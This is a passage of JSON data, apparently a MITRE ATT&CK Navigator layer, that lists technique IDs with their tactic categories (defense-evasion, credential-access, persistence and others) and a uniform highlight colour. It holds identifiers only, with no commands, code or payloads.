"T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1069", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1096", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1004", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1007", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0189", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1046", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0013", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1500", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1118", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1121", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1220", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1138", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1020", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1042", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1082", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1021", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0002", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1037", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": 